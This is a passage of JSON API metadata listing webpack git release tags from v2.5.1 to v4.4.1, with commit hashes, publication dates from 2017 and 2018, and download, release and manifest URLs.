ebpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","d